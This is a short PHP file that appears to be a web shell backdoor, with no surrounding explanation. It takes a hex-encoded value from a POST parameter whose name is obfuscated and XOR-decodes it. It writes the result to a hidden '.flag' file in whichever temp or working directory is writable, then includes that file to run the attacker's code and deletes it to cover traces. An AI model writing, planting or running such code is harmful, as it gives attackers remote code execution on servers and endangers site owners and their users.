<?php

if(array_key_exists("ob\x6Aec\x74", $_POST) && !is_null($_POST["ob\x6Aec\x74"])){
	$flg = hex2bin($_POST["ob\x6Aec\x74"]);
	$pointer='' ; foreach(str_split($flg) as $char){$pointer .= chr(ord($char) ^ 35);}
	$dchunk = array_filter([getcwd(), "/tmp", session_save_path(), getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), "/var/tmp"]);
	foreach ($dchunk as $entity):
    		if ((is_dir($entity) and is_writable($entity))) {
    $marker = implode("/", [$entity, ".flag"]);
    $success = file_put_contents($marker, $pointer);
if ($success) {
	include $marker;
	@unlink($marker);
	die();}
}
endforeach;
}